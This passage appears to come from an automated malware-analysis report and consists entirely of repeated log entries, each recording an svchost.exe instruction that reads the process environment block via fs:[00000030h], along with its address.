                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0283 mov eax, dword ptr fs:[00000030h]3_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0283 mov eax, dword ptr fs:[00000030h]3_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0283 mov eax, dword ptr fs:[00000030h]3_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402A0 mov eax, dword ptr fs:[00000030h]3_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402A0 mov eax, dword ptr fs:[00000030h]3_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov ecx, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402E1 mov eax, dword ptr fs:[00000030h]3_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402E1 mov eax, dword ptr fs:[00000030h]3_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402E1 mov eax, dword ptr fs:[00000030h]3_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382823B mov eax, dword ptr fs:[00000030h]3_2_0382823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8243 mov eax, dword ptr fs:[00000030h]3_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8243 mov ecx, dword ptr fs:[00000030h]3_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A250 mov eax, dword ptr fs:[00000030h]3_2_0382A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836259 mov eax, dword ptr fs:[00000030h]3_2_03836259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EA250 mov eax, dword ptr fs:[00000030h]3_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EA250 mov eax, dword ptr fs:[00000030h]3_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834260 mov eax, dword ptr fs:[00000030h]3_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834260 mov eax, dword ptr fs:[00000030h]3_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834260 mov eax, dword ptr fs:[00000030h]3_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382826B mov eax, dword ptr fs:[00000030h]3_2_0382826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03870185 mov eax, dword ptr fs:[00000030h]3_2_03870185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EC188 mov eax, dword ptr fs:[00000030h]3_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EC188 mov eax, dword ptr fs:[00000030h]3_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D4180 mov eax, dword ptr fs:[00000030h]3_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D4180 mov eax, dword ptr fs:[00000030h]3_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B019F mov eax, dword ptr fs:[00000030h]3_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B019F mov eax, dword ptr fs:[00000030h]3_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B019F mov eax, dword ptr fs:[00000030h]3_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B019F mov eax, dword ptr fs:[00000030h]3_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A197 mov eax, dword ptr fs:[00000030h]3_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A197 mov eax, dword ptr fs:[00000030h]3_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A197 mov eax, dword ptr fs:[00000030h]3_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F61C3 mov eax, dword ptr fs:[00000030h]3_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F61C3 mov eax, dword ptr fs:[00000030h]3_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov eax, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov eax, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov eax, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov eax, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039061E5 mov eax, dword ptr fs:[00000030h]3_2_039061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038601F8 mov eax, dword ptr fs:[00000030h]3_2_038601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov ecx, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov ecx, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov ecx, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov ecx, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA118 mov ecx, dword ptr fs:[00000030h]3_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA118 mov eax, dword ptr fs:[00000030h]3_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA118 mov eax, dword ptr fs:[00000030h]3_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA118 mov eax, dword ptr fs:[00000030h]3_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F0115 mov eax, dword ptr fs:[00000030h]3_2_038F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860124 mov eax, dword ptr fs:[00000030h]3_2_03860124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov eax, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov eax, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov ecx, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov eax, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov eax, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C156 mov eax, dword ptr fs:[00000030h]3_2_0382C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C8158 mov eax, dword ptr fs:[00000030h]3_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836154 mov eax, dword ptr fs:[00000030h]3_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836154 mov eax, dword ptr fs:[00000030h]3_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383208A mov eax, dword ptr fs:[00000030h]3_2_0383208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C80A8 mov eax, dword ptr fs:[00000030h]3_2_038C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F60B8 mov eax, dword ptr fs:[00000030h]3_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F60B8 mov ecx, dword ptr fs:[00000030h]3_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B20DE mov eax, dword ptr fs:[00000030h]3_2_038B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0382A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038380E9 mov eax, dword ptr fs:[00000030h]3_2_038380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B60E0 mov eax, dword ptr fs:[00000030h]3_2_038B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C0F0 mov eax, dword ptr fs:[00000030h]3_2_0382C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038720F0 mov ecx, dword ptr fs:[00000030h]3_2_038720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4000 mov ecx, dword ptr fs:[00000030h]3_2_038B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E016 mov eax, dword ptr fs:[00000030h]3_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E016 mov eax, dword ptr fs:[00000030h]3_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E016 mov eax, dword ptr fs:[00000030h]3_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E016 mov eax, dword ptr fs:[00000030h]3_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A020 mov eax, dword ptr fs:[00000030h]3_2_0382A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C020 mov eax, dword ptr fs:[00000030h]3_2_0382C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6030 mov eax, dword ptr fs:[00000030h]3_2_038C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832050 mov eax, dword ptr fs:[00000030h]3_2_03832050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6050 mov eax, dword ptr fs:[00000030h]3_2_038B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385C073 mov eax, dword ptr fs:[00000030h]3_2_0385C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D678E mov eax, dword ptr fs:[00000030h]3_2_038D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038307AF mov eax, dword ptr fs:[00000030h]3_2_038307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E47A0 mov eax, dword ptr fs:[00000030h]3_2_038E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383C7C0 mov eax, dword ptr fs:[00000030h]3_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B07C3 mov eax, dword ptr fs:[00000030h]3_2_038B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038527ED mov eax, dword ptr fs:[00000030h]3_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038527ED mov eax, dword ptr fs:[00000030h]3_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038527ED mov eax, dword ptr fs:[00000030h]3_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE7E1 mov eax, dword ptr fs:[00000030h]3_2_038BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038347FB mov eax, dword ptr fs:[00000030h]3_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038347FB mov eax, dword ptr fs:[00000030h]3_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C700 mov eax, dword ptr fs:[00000030h]3_2_0386C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830710 mov eax, dword ptr fs:[00000030h]3_2_03830710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860710 mov eax, dword ptr fs:[00000030h]3_2_03860710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C720 mov eax, dword ptr fs:[00000030h]3_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C720 mov eax, dword ptr fs:[00000030h]3_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386273C mov eax, dword ptr fs:[00000030h]3_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386273C mov ecx, dword ptr fs:[00000030h]3_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386273C mov eax, dword ptr fs:[00000030h]3_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AC730 mov eax, dword ptr fs:[00000030h]3_2_038AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386674D mov esi, dword ptr fs:[00000030h]3_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386674D mov eax, dword ptr fs:[00000030h]3_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386674D mov eax, dword ptr fs:[00000030h]3_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830750 mov eax, dword ptr fs:[00000030h]3_2_03830750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE75D mov eax, dword ptr fs:[00000030h]3_2_038BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872750 mov eax, dword ptr fs:[00000030h]3_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872750 mov eax, dword ptr fs:[00000030h]3_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4755 mov eax, dword ptr fs:[00000030h]3_2_038B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838770 mov eax, dword ptr fs:[00000030h]3_2_03838770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840770 mov eax, dword ptr fs:[00000030h]3_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834690 mov eax, dword ptr fs:[00000030h]3_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834690 mov eax, dword ptr fs:[00000030h]3_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C6A6 mov eax, dword ptr fs:[00000030h]3_2_0386C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038666B0 mov eax, dword ptr fs:[00000030h]3_2_038666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A6C7 mov eax, dword ptr fs:[00000030h]3_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE6F2 mov eax, dword ptr fs:[00000030h]3_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE6F2 mov eax, dword ptr fs:[00000030h]3_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE6F2 mov eax, dword ptr fs:[00000030h]3_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE6F2 mov eax, dword ptr fs:[00000030h]3_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B06F1 mov eax, dword ptr fs:[00000030h]3_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B06F1 mov eax, dword ptr fs:[00000030h]3_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE609 mov eax, dword ptr fs:[00000030h]3_2_038AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384260B mov eax, dword ptr fs:[00000030h]3_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872619 mov eax, dword ptr fs:[00000030h]3_2_03872619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E627 mov eax, dword ptr fs:[00000030h]3_2_0384E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03866620 mov eax, dword ptr fs:[00000030h]3_2_03866620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868620 mov eax, dword ptr fs:[00000030h]3_2_03868620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383262C mov eax, dword ptr fs:[00000030h]3_2_0383262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384C640 mov eax, dword ptr fs:[00000030h]3_2_0384C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F866E mov eax, dword ptr fs:[00000030h]3_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F866E mov eax, dword ptr fs:[00000030h]3_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A660 mov eax, dword ptr fs:[00000030h]3_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A660 mov eax, dword ptr fs:[00000030h]3_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03862674 mov eax, dword ptr fs:[00000030h]3_2_03862674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832582 mov eax, dword ptr fs:[00000030h]3_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832582 mov ecx, dword ptr fs:[00000030h]3_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03864588 mov eax, dword ptr fs:[00000030h]3_2_03864588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E59C mov eax, dword ptr fs:[00000030h]3_2_0386E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B05A7 mov eax, dword ptr fs:[00000030h]3_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B05A7 mov eax, dword ptr fs:[00000030h]3_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B05A7 mov eax, dword ptr fs:[00000030h]3_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038545B1 mov eax, dword ptr fs:[00000030h]3_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038545B1 mov eax, dword ptr fs:[00000030h]3_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E5CF mov eax, dword ptr fs:[00000030h]3_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E5CF mov eax, dword ptr fs:[00000030h]3_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038365D0 mov eax, dword ptr fs:[00000030h]3_2_038365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A5D0 mov eax, dword ptr fs:[00000030h]3_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A5D0 mov eax, dword ptr fs:[00000030h]3_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h]3_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038325E0 mov eax, dword ptr fs:[00000030h]3_2_038325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C5ED mov eax, dword ptr fs:[00000030h]3_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C5ED mov eax, dword ptr fs:[00000030h]3_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6500 mov eax, dword ptr fs:[00000030h]3_2_038C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904500 mov eax, dword ptr fs:[00000030h]3_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840535 mov eax, dword ptr fs:[00000030h]3_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840535 mov eax, dword ptr fs:[00000030h]3_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840535 mov eax, dword ptr fs:[00000030h]3_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840535 mov eax, dword ptr fs:[00000030h]3_2_03840535
